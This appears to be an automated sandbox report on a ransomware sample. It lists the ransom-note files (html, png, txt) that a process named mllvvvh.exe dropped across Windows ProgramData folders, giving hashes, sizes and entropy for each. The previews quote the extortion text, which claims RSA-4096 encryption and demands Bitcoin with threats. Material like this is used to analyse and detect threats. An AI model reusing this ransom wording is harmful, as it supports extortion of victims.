                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows NT\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows NT\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows NT\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows Security Health\Logs\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows Security Health\Logs\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows Security Health\Logs\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows Security Health\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows Security Health\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows Security Health\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\Caches\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\Caches\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows\Caches\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\ClipSVC\Archive\Apps\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\ClipSVC\Archive\Apps\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows\ClipSVC\Archive\Apps\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\ClipSVC\Archive\KeyHolder\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\ClipSVC\Archive\KeyHolder\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
